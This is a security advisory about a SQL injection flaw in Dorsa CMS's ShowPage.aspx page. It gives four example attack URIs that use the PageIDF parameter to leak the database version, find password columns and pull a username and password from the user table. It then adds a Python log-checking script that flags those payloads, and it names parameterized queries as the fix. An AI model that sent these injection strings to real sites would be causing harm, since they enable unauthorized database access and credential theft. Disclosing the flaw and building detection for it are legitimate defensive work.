Dorsa CMS 'ShowPage.aspx' SQL Injection Vulnerability
An attacker can exploit this issue with a browser. The following example URIs are available:

http://www.example.com/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,@@version)--

http://www.example.com/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27))--

http://www.example.com/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27 and table_name not in ('Seller')))--

http://www.example.com/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 %2b'Username= '%2bconvert(varchar,isnull(convert(varchar,user_name),'NULL'))%2b' -- Password= : '%2bconvert(varchar,isnull(convert(varchar,Pass),'NULL')) from USER_ where Code='1'))
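A log check for the request pattern above, as an added example that is not part of the original advisory: it flags requests to ShowPage.aspx whose PageID or PageIDF value is not a plain integer. The log lines are constructed, and the assumption that both parameters are always integer identifiers is inferred from the example URIs.

```python
import re
from urllib.parse import parse_qsl

# Assumption: PageID and PageIDF only ever carry integer identifiers,
# as they do in the benign part of the advisory's example URIs.
NUMERIC_PARAMS = {"pageid", "pageidf"}
INT_RE = re.compile(r"-?\d{1,10}")

# Constructed log lines (method, path, query, client IP); not real traffic.
SAMPLE_LOG = """\
GET /ShowPage.aspx page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 198.51.100.7
GET /ShowPage.aspx page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2+or+1=convert(int,@@version)-- 203.0.113.9
GET /ShowPage.aspx page_=news&lang=1&PageID=36%20or%201=1&PageIDF=2 203.0.113.9
GET /Default.aspx PageIDF=abc 198.51.100.7
"""


def suspicious_requests(log_text):
    """Return (client_ip, param, decoded_value) for non-integer page identifiers."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # not a line in the constructed four-field format
        _method, path, query, client = fields
        if not path.lower().endswith("/showpage.aspx"):
            continue
        # parse_qsl decodes %xx and '+' and splits each pair on the first '=',
        # so text appended after the number stays part of the value.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() in NUMERIC_PARAMS and not INT_RE.fullmatch(value):
                hits.append((client, name, value))
    return hits


if __name__ == "__main__":
    for client, name, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-integer {name}: {value!r}")
```

The same integer check, applied server-side before the value reaches the query and combined with a parameterized statement, is the corresponding fix.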